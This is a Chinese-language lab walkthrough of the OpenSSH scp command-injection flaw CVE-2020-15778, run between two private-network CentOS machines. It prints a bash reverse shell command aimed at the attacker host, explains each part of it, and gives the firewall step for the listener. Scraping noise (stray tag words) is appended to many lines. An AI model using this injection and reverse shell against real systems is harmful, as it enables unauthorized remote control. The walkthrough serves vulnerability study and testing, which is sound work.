OpenSSH 8.3p1及以前版本中的scp容许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。linux
参考连接:https://github.com/cpandya2909/CVE-2020-15778git
攻击机:Centos7.6 10.10.10.133github
靶机:Centos7.6 10.10.10.134shell
首先确认靶机OpenSSH版本是否在漏洞影响范围安全
scp是 linux 系统下基于 ssh 登录进行安全的远程文件拷贝命令,命令格式:bash
scp local_file remote_username@remote_ip:remote_file
攻击机在当前目录下建立一个拷贝用的测试文件test.txtssh
远程拷贝文件tcp
能够看到,在靶机上对比以前已经有拷贝过去的文件了测试
经过特殊符号 ` 进行远程命令注入攻击blog
命令执行成功
便可以在``内实现任意远程命令执行,甚至是从网上下载准备好的后门或者其余恶意程序
命令格式:
bash -i >&/dev/tcp/10.10.10.133/6666 0>&1
命令解析
命令 | 解释 |
bash -i | 产生一个交互式bash |
>& /dev/tcp/ip/port | 创建TCP链接,并将标准输出和错误重定向到TCP链接 |
0>&1 | 从TCP链接获取输入 |
打开攻击机监听端口,如6666
firewall-cmd --zone=public --add-port=6666/tcp --permanent
新开一个窗口开启监听
攻击机原窗口进行反弹shell命令注入攻击
执行成功,成功回显
此漏洞利用有必定的局限性,须要经过SSH身份认证。可是该漏洞影响范围很是广,且官方还没有发布安全更新补丁,请持续关注。